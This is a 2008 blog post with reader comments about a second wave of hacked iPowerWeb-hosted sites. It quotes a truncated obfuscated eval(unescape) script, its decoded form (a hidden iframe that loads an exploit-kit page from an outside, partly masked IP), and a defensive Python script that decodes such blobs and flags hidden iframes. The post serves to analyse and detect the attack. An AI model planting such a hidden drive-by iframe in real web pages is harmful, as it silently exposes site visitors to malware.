Sunday, July 06, 2008

iPowerWeb Hacking Continues

Over a year ago I wrote about a bunch of iPowerWeb's shared servers being hacked, and it looked like they were trying to clean it up, but now it's time for round two of hacking.

The latest batch of hacked sites may have a DNS hack as well; I'm not sure that's the case, but Alex seems to think it is.

All these sites have the following Whois Name Server entries:

Name Server: NS1.IPOWERDNS.COM
Name Server: NS1.IPOWERWEB.NET

Sure looks like iPowerWeb, right?

But the reverse DNS for all of them goes to IPs on *.static.eigbox.net, which links to BIZLAND.

Here's a sample of the javascript in this round of site hacking:
eval(unescape("%77%69%6e%64%6f%77%2e%73%74...."));
Don't go to the link below if you know what's good for you; it's not safe.

The javascript above, when decoded, is the following:
window.status='Done';document.write('<iframe name=f2f8f656791 src=\'http:// 58.65.232.*/gpack/index.php?'+Math.round(Math.random()*74880)+'2\' width=480 height=156 style=\'display: none\'></iframe>')
You guessed it, bad things happen at 58.65.232.33, which APNIC attributes to hostfresh.com out of Hong Kong, a company that lists a San Francisco mailbox on its website.
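The decode step above is the whole trick: the injected script hides a drive-by iframe behind eval(unescape(...)) so a casual look at the page source shows only percent-escapes. The following triage script is an added example, not code from the post; it reproduces the legacy JavaScript unescape() decoding, pulls every such blob out of a saved page, and flags iframes hidden with display:none or visibility:hidden. It goes a little beyond the single case in the post by also flagging frames collapsed to 1x1 or 0x0, another common variant. The sample page is constructed here and uses the reserved placeholder host example.invalid rather than the address named above.

```python
import re
from typing import Dict, List

# Percent-escape decoding as done by the legacy JavaScript unescape(): %XX -> chr(0xXX),
# %uXXXX -> chr(0xXXXX). urllib.parse.unquote would treat %XX as UTF-8 bytes and ignores
# %u sequences, so a small custom decoder is used instead.
_ESCAPE_SEQ_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def js_unescape(encoded: str) -> str:
    """Decode a string produced by JavaScript escape()."""
    return _ESCAPE_SEQ_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), encoded)


def js_escape(text: str) -> str:
    """Encode every character, as the injected scripts do; used here only to build the sample."""
    return "".join(f"%{ord(c):02X}" if ord(c) < 0x100 else f"%u{ord(c):04X}" for c in text)


# eval(unescape("...")) with either quote style; the percent-encoded payload is group 2.
_EVAL_UNESCAPE_RE = re.compile(
    r"""eval\s*\(\s*unescape\s*\(\s*(['"])(.*?)\1\s*\)\s*\)""", re.DOTALL
)
_IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
# name=value pairs; the quotes may be backslash-escaped because the tag sits inside a
# JavaScript string handed to document.write().
_ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:\\?(['"])(.*?)\\?\2|([^\s>'"]+))""")


def extract_eval_unescape_payloads(html: str) -> List[str]:
    """Return the decoded body of every eval(unescape(...)) call found in the page."""
    return [js_unescape(m.group(2)) for m in _EVAL_UNESCAPE_RE.finditer(html)]


def find_hidden_iframes(decoded_js: str) -> List[Dict[str, object]]:
    """Flag iframes hidden via CSS, or collapsed to 1x1 / 0x0 (a variant not shown in the post)."""
    findings = []
    for tag in _IFRAME_RE.finditer(decoded_js):
        attrs = {}
        for a in _ATTR_RE.finditer(tag.group(1)):
            attrs[a.group(1).lower()] = a.group(3) if a.group(3) is not None else a.group(4)
        style = attrs.get("style", "").replace(" ", "").lower()
        reasons = []
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("style hides the frame")
        for dim in ("width", "height"):
            value = attrs.get(dim, "")
            if value.isdigit() and int(value) <= 1:
                reasons.append(f"{dim}={value}")
        if reasons:
            findings.append({"src": attrs.get("src", ""), "reasons": reasons})
    return findings


def triage_page(html: str) -> List[Dict[str, object]]:
    """Decode each obfuscated blob in a page and report the hidden iframes it writes."""
    return [
        {"decoded": decoded, "hidden_iframes": find_hidden_iframes(decoded)}
        for decoded in extract_eval_unescape_payloads(html)
    ]


# Constructed sample modelled on the decoded script quoted in the post. The host is the
# reserved placeholder example.invalid, not the address named in the post.
SAMPLE_DECODED = (
    "window.status='Done';document.write('<iframe name=f2f8f656791 "
    "src=\\'http://example.invalid/gpack/index.php?'+Math.round(Math.random()*74880)+'2\\' "
    "width=480 height=156 style=\\'display: none\\'></iframe>')"
)
SAMPLE_HTML = (
    '<html><body><p>welcome</p><script>eval(unescape("'
    + js_escape(SAMPLE_DECODED)
    + '"));</script></body></html>'
)

if __name__ == "__main__":
    for entry in triage_page(SAMPLE_HTML):
        print("decoded:", entry["decoded"])
        for f in entry["hidden_iframes"]:
            print("hidden iframe ->", f["src"], "|", ", ".join(f["reasons"]))
```

Run against a saved copy of a suspect page, the script reports only the static part of the iframe URL (up to the `?`), because the rest is generated at runtime by the Math.random() cache-buster; that prefix is what you want in a blocklist or a grep across the rest of the server anyway. The first nine escapes quoted in the post, %77%69%6e%64%6f%77%2e%73%74, decode to "window.st", which is how you can confirm a blob is the same family without running it.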

Can someone explain why this exploit site still exists if these guys are doing business with a US address and all hell isn't raining down on their parade?

I don't get it, the web has gone mad...

5 comments:

Kikkus said...

A few months ago, the same problem on servage.net. I contacted the support but they are too idiotic to understand the problem, so I changed ISP. After 3 weeks they had fixed all the infected pages and no one noted anything about this!!

Sure, 100%, servage.net is a crap ISP.

Anonymous said...

http://www.spamhaus.org/sbl/sbl.lasso?query=SBL52081
"hostfresh.com - mass spammer hosting

Just swarming with spammers, phishers and other cybercriminals."

kikkus: servage.net is not as bad as hostfresh.com, but they work hard to get on blacklists, just like IP69, Shark Systems, First Colo and many other dark server providers do.

IncrediBILL said...

Too funny, I had to mess up the javascript example because Avast started screaming that my blog had a virus.

Didn't want people to think this site was infected, so I threw a few spaces in the script to mess it up.

Ban Proxies said...

Some things never really change, they just get upgraded. I can recall the many hacked sites at geocities years ago. Someone, or some group, knows which "hosts" are vulnerable and they just continue to return.

What's the Latin version of "Buyer Beware"?

Anonymous said...

Caveat emptor.